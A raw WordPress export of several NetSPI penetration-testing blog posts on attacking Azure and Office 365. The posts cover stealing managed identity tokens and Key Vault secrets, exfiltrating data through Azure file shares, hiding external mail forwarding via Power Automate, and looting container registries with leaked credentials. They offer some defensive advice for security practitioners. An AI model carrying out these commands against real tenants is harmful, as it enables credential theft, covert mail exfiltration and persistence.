  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here's a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

Keyvault

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scope to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

[post_title] => Lateral Movement in Azure App Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lateral-movement-azure-app-services [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:40 [post_modified_gmt] => 2023-03-16 14:26:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11728 [menu_order] => 416 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 11720 [post_author] => 10 [post_date] => 2020-07-29 07:00:30 [post_date_gmt] => 2020-07-29 07:00:30 [post_content] =>

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

Ctcreds

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's less concern of someone decrypting the credential data from the logs after the fact.

The Results

Those same credentials from above will now look like this in the output logs:

Enccreds

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

[post_title] => Get-AzPasswords: Encrypting Automation Password Data [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => encrypting-password-data-in-get-azpasswords [to_ping] => [pinged] => [post_modified] => 2023-04-28 13:31:40 [post_modified_gmt] => 2023-04-28 18:31:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11720 [menu_order] => 423 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 11709 [post_author] => 10 [post_date] => 2020-07-16 07:00:53 [post_date_gmt] => 2020-07-16 07:00:53 [post_content] =>

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: testingboxtools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence… I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”), and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mention on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.netpayloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things, and you can remove the connectTestResult commands from the above command:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"AzureSTORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`" STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure STORAGE_ACCT_NAME`" /pass:`" STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.

[post_title] => Azure File Shares for Pentesters [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-file-shares-for-pentesters [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:27:15 [post_modified_gmt] => 2023-03-16 14:27:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11709 [menu_order] => 427 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 11569 [post_author] => 10 [post_date] => 2020-06-25 07:00:40 [post_date_gmt] => 2020-06-25 07:00:40 [post_content] =>

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".

Connections

2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.

Newconnection

3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".

Start

5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.

Build

6. Select any advanced options and add a new step.

Newstep

7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.

Addedstep

8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.

Messageid

9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but really recommended - Add one more step "Mark as read or unread (V2)" from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.

Unread

11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

Success

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office365 Security & Compliance center, so you can at least log and alert on the creation of new flow.

For anyone looking to map these activities back to the Mitre ATT&CK framework, check out these links:

Prior Work

Some related prior Microsoft Flow related research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-forwarding-restrictions-power-automate [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:48:53 [post_modified_gmt] => 2023-06-13 14:48:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11569 [menu_order] => 433 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 11564 [post_author] => 10 [post_date] => 2020-05-12 07:00:00 [post_date_gmt] => 2020-05-12 07:00:00 [post_content] =>

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.

Acrinfo

For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords, to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.

Acrpass

The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

Basicauth

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

Enumtags

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that can run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container, bash may not always be available for you

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
[
{
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "netspiACR.azurecr.io",
"name": "netspiACR",
[Truncated]
"type": "Microsoft.ContainerRegistry/registries"
}
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR
[
"ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
"latest"
]

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated, have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-acrs-with-compromised-credentials [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:23 [post_modified_gmt] => 2021-06-08 22:00:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11564 [menu_order] => 448 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 18419 [post_author] => 53 [post_date] => 2020-04-16 15:47:52 [post_date_gmt] => 2020-04-16 20:47:52 [post_content] =>
Watch Now

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. Additionally, attackers are automated and capable. While these attackers continuously probe and find access or vulnerabilities on many different levels, their success usually results from human error in code or infrastructure configurations, such as open admin ports and over privileged identity roles.

During this co-sponsored webinar, you will learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. NetSPI and DisruptOps will share how to find and remediate your own vulnerabilities more efficiently, before the attackers do.

[wonderplugin_video iframe="https://youtu.be/4B9ZTgwkReM" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]